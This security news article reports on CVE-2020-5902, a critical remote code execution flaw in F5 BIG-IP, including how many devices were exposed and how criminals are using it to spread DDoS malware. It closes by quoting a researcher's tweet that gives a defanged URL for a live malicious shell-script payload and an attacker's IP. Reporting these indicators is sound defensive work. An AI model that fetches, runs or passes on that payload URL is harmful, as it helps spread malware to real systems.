Last week, we talked about an extremely dangerous RCE problem fixed in the configuration interface of the popular BIG-IP application delivery controller. This vulnerability was discovered by Positive Technologies experts, and received an identifier. CVE-2020-5902 and scored 10 points on the CVSSv3 scale (out of 10 possible), which corresponds to the highest level of danger.
By exploiting a bug found by experts, an attacker is able to execute commands on behalf of an unauthorized user and completely compromise the system, for example, intercept the traffic of web resources controlled by the controller. The attack can be implemented remotely.
Positive Technologies analysts wrote that as of the end of June 2020, there were over 8,000 vulnerable devices accessible from the Internet in the world, 40% of them in the USA, 16% in China, 3% in Taiwan, 2.5% each – in Canada and Indonesia. Fortunately, less than 1% of vulnerable devices were discovered in Russia, but it should be noted that F5 engineers have already released fixes that organizations were recommended to install immediately.
IS researchers wrote that in terms of scale this problem is very similar to the RCE vulnerabilities in Pulse Secure VPN and Citrix network gateways. Such bugs are very popular with cybercriminals and are usually used by them to gain a foothold in corporate networks (after that, hackers deploy backdoors in corporate networks, steal confidential files or deploy extortion software). For example, hacking groups REvil, Maze and Netwalker often rely on such vulnerabilities, which allows them to compromise the largest companies in the world.
The other day, experts already warned about the availability of PoC exploits for this problem and the beginning of attacks on vulnerabilities. Exploits and Technical information were released shortly after disclosing data on the vulnerability itself, and researchers noted that the entire exploit fits in one tweet.
Now, Bad Packets experts have estimated that approximately 635 unique network service providers still host vulnerable BIG-IP endpoints, and among them there are government organizations, educational institutions, medical and financial companies from the Fortune 500 list.
If hackers previously searched for vulnerable systems and tried to get passwords from them, now Bad Packets analysts write that they have detected attacks on CVE-2020-5902 aimed at spreading DDoS-malware, and this activity comes from IP addressesthat has previously been implicated in other malicious activities.
Active DDoS malware payload detected:
http: //panel.devilsden (.) net / iot.sh
Exploit attempt source IP: 22.214.171.124 (🇷🇴)
– Bad Packets (@bad_packets) July 6, 2020